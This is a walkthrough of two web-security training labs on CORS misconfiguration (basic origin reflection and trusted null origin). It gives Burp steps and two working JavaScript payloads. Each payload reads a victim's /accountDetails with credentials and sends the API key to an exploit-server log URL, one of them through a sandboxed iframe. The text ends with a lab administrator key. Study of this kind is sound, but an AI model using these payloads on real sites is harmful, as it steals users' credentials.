# Some cases of Cross-origin resource sharing (CORS)

## 1. CORS vulnerability with basic origin reflection

Log on to the account with `username = wiener`, `password = peter`

Using Burp, the Proxy tab proceeds to search for the `/accountDetails` section where included response information about API key. Then `Send to repeater`.

Adding the Origin: `http:/random-website.com`, then click `send`

After adding Origin, we proceed to return to the website as `Go to exploit server`. Change the server body structure as follows:

```
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>
```

Then click `Store` => `View exploit` => `Deliver exploit to victim` => `Access log`

Find the result having the `log?key' return and then insert it into `submit` filed.

## 2. CORS vulnerability with trusted null origin

Check intercept is off, then use Burp's browser to log in to your account. Click "My account".

Review the history and observe that your key is retrieved via an AJAX request to `/accountDetails`, and the response contains the Access-Control-Allow-Credentials header suggesting that it may support CORS.

Send the request to Burp Repeater, and resubmit it with the added header `Origin: null`.

Observe that the "null" origin is reflected in the Access-Control-Allow-Origin header.

In the browser, go to the exploit server and enter the following HTML, replacing `YOUR-LAB-ID` with the URL for your unique lab URL and `YOUR-EXPLOIT-SERVER-ID` with the exploit server ID:

```
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>
```

Notice the use of an iframe sandbox as this generates a null origin request.

Click "View exploit". Observe that the exploit works - you have landed on the log page and your API key is in the URL.

Go back to the exploit server and click "Deliver exploit to victim".

Click "Access log", retrieve and submit the victim's API key to complete the lab.

And the API's key of administrator is `Q3RFRsyrZ14aNYyS7GkyUj5UcMQXQsyJ`
